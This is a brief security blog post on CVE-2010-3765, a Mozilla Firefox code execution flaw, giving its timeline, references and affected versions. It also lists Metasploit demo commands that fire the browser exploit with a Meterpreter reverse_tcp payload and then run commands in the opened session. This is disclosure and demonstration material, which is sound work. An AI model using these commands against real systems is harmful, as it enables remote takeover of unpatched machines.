CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit
Powered by iSpeech
Blog : http://eromang.zataz.com
Twitter : http://twitter.com/eromang
Timeline :
Vulnerability discovered in the wild
Vulnerability corrected by vendor the 2010-10-27
Vulnerability & Exploit-DB PoC disclosed by unknown the 2010-10-29
Metasploit PoC released the 2011-02-17
PoC provided by:
unknown
scriptjunkie
Reference(s) :
CVE-2010-3765
MFSA 2010-73
EDB-ID-15352
OSVDB-ID-68905
Affected versions :
All Firefox 3.6.x versions previous version 3.6.12
All Firefox 3.5.x versions previous version 3.5.15
All Thunderbird 3.1.x versions previous version 3.1.6
All Thunderbird 3.0.x versions previous version 3.0.10
All SeaMonkey 2.0.x versions previous version 2.0.10
Tested on Windows XP SP3 with Firefox 3.6.9 released the 2010-09-23
Description :
This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a metasploit port of the in-the-wild exploit.
Metasploit demo :
use exploit/windows/browser/mozilla_interleaved_write
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
getuid
sysinfo
ipconfig
2011-02-19 09:13:04
source
Gloss